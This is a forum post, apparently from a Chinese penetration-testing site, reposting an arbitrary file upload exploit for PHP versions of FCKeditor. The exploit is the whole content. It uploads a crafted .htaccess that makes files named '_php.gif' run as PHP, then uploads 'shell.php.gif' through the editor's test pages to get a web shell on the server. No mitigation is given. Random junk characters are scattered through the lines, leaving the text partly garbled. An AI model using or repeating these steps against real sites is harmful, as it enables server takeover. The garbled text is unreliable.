中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]
作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞
" n$ c( y6 b6 b: o+ ^- d- ?作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
( G- C; n3 S, P/ R3 k1 L减小字体 增大字体
1 i3 R9 f* J! F7 m[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
( k7 X: |/ t: Q7 e# x# t[+] Date: 2011+ D7 r! Q2 o* n3 U- N) ]% I" T% A
[+] Author : sinesafe.cn, k- E7 ~0 l9 k! a' D
[+] Website : WwW.sinesafe.cn
; g( d6 O) |: z" R1 X———————————————————
0 R  }* Q4 l. b, A- [1.create a htaccess file:
: l" H, s% c9 N4 w) ^code:
, }) f! H" ?9 ?" g<FilesMatch “_php.gif”>) E: ]8 C3 o4 U( E4 t% d
SetHandler application/x-httpd-php9 H! N( o" b- ^) s; y2 Q2 x
</FilesMatch># G2 A4 H% O# O4 y

6 H$ e. D& `0 |/ f) S$ U2.Now upload this htaccess with FCKeditor.
4 h) t8 R0 C' D: M; [  x2 t2 N& j  e) Y# }
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
4 l8 v' s  y2 ]
* w3 A, ]- E( G% d' r8 G( zhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
6 s+ ], V0 B; @2 Y+ R  D8 d, C0 ~
———————————————————————————————-
& W2 v; |6 R' X/ C3.Now upload shell.php.gif with FCKeditor.
+ [/ [$ p) z6 H4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.5 P- v# i) o5 ^
5.http://www.sinesafe.cn/anything/shell_php.gif6 p2 S7 z7 y( q; J. c$ E5 J  o; J
6.Now shell is available from server.
- o; A" D% E! o* {

7 @  I0 T' h; k% J
& l7 |$ G# W* ~* m# S* k1 j



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2